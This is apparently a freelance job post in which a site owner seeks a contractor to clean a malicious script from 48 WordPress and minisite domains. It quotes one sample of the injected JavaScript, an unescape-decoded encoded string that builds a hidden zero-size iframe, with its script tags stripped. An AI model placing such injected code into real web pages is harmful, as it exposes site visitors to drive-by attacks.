I want someone to clean up the domains on one of my servers. Most of them have become infected by a malicious script and I want to totally removed as quickly as possible.
There are 48 domains. Several are not used but were still infected. These are mainly what are called “minisites??, a few sales pages. Most but not all have Wordpress installed.
I want someone to clean up the domains on one of my servers. Most of them have become infected by a malicious script and Google has delisted one of my domains.
I have spent time cleaning this up myself and maybe there isn’t much left to do. I just don’t know. The infestations seemed to be mainly on the index pages. I found and deleted a .txt called [url removed, login to view] I have removed the script from page after page.
There are 48 domains. Several are not used but were still infected. These are mainly what are called “minisites??, a few sales pages. Most but not all have Wordpress installed. The hackers have placed script on different [url removed, login to view] pages??"sometimes the one in the root, sometimes the one in the theme folder etc.
What I want now is someone to go through all the domains, you must have some kind of global search function to check all the pages (the word “unescape?? seems to be common to all variants). All the script must be cleared and clean pages uploaded back to the site.
Here’s an example of these scripts from one of the pages:
var Z = '0 03c0 0690 0660 0720 0610 06d0 0650 0200 0730 0720 0630 03d0 0220 0680 0740 0740 0700 03a0 02f0 02f0 0720 0610 0690 06e0 0620 06f0 0780 02e0 0750 0730 02f0 0610 0640 06f0 0620 0650 02f0 0690 06e0 0640 0650 0780 02e0 0700 0680 0700 0220 0200 0770 0690 0640 0740 0680 03d0 0220 0300 0220 0200 0680 0650 0690 0670 0680 0740 03d0 0220 0300 0220 0200 0660 0720 0610 06d0 0650 0620 06f0 0720 0640 0650 0720 03d0 0220 0300 0220 03e0 03c0 02f0 0690 0660 0720 0610 06d0 0650 03e'; XX = [url removed, login to view](/0 0/g,'%'); [url removed, login to view](unescape(XX)); </script> fr"+"a"+"m"+"ebor"+"de"+"r="0"><"+"/ifra"+"m"+"e>");
(I have removed the <script></script> tags from this page, so there is no danger of it running)
You need to be aware of the possible dangers to yourself. I will not accept liability for any self-inflicted damage caused by your mis-handling the script.
From knowledge of the number of domains and what I have already found, I believe you could fix this in just a few hours. My budget will be from $5 to $10 an hour. If you want more, please don’t bid. There are plenty who will bid at this (or lower).
Important: I want a complete bid for fully finishing the work, not an hourly rate.
In posting a bid, please supply some evidence that you are competent for this job.
It isn’t a big one but it must be done thoroughly and correctly.
I will, of course, provide ftp and PW access to the right bidder.
Language and region is not a barrier, providing you can communicate clearly with me.
I want it fast. I want this done within 48 hours of assigning the task and putting money in escrow.
If you need to know anything else, ask first. The result I am paying for is not time or tasks, it’s this:
All malicious scripts gone from all my domains on that server.
When you’ve done that, I’ll release the money.